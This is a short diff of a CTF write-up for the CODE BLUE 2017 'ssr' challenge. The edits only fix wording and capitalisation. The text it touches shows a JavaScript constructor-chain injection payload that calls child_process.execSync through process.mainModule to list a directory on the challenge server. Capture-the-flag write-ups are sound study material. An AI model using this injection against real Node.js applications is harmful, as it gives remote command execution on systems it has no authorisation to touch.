LyleMi/CTF/2017/codebule/ssr/index.md

 function(){constructor,constructor,0;return '1'}
 ```

-now we can generate an arbitrarily function, we can use it by ``call`` method with visit url http://ssr.tasks.ctf.codeblue.jp/idols/0/call.
+Now we can generate an arbitrarily function, we can use this function by ``call`` method with visit url http://ssr.tasks.ctf.codeblue.jp/idols/0/call.

-so let's list directory first
+so let's list directory first, try

-try

 ```
 [{"key":["constructor","constructor","0%3Breturn process.mainModule.require('child_process').execSync('ls /usr/local/ssr/')+''"]}]